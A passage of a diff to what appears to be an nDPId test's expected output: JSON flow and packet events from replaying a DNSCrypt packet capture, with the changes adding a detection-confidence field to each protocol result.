AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":235,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAABQwbUAub0RkXgKAAABLZm7YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":235,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAXcwbYgAL0RbKQKAAABLZm7YLOjEPcGBK77MPMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":237,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAABQwbYAub0RkXcKAAABLZm7YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":237,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAIcwbdAAL0RUGMKAAABLZm7YLPvEPcCCKvPMPYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAIcwbhAAL0RUGIKAAABLZm7YKh5EPcCCKvPMPQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAXcwbkgAL0RbKEKAAABLZm7YJ4DEPcGBMSXMPcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":241,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAABQwbkAub0RkXQKAAABLZm7YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":241,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":946739312132,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"ts_msec":946739312132,"pkt":"ZmZmZmZmRERERERECABFAADZ1M0AADURfjozDz5BCgAAAQG7gvEAxUKLxUSBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAG60zsERLlFII2wj6zTIwofCbgq4wxjKMp9YEu9fS884Cf11c1Q4cTQ+J+ZjK7ZH4aaqK8VPbAGFYW80ueYrfwU8FAQJxEup2Hwk1EI2Qz7npiyDDRkpQyGDCxkaPRZtbjwUBAnES6nYAAAAAV9TrQRfVP6E"}
@@ -513,26 +513,26 @@
 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":946739312183,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739312183,"pkt":"ZmZmZmZmRERERERECABFAADWP4JAADYRWt8tmbtgCgAAARD3ngMAwicyMPeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAJDQ0ZbvRpC3D0bgumZKuy3tvg+CeWgIXh45Ishvbc3SjW3OKRxUShg2C7mIARv2NR589zRzZQEE1IcPTnNuvwAPMT4OYzIpCP1X\/njGK43zV6uPrF4F7max8o8+EVSzPA8xPg5jMikIAAAAAV9TfFZfVM3W"}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAIcaDJAAL0RMhoKAAABQlUec9pYAbsCCCOeLCwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
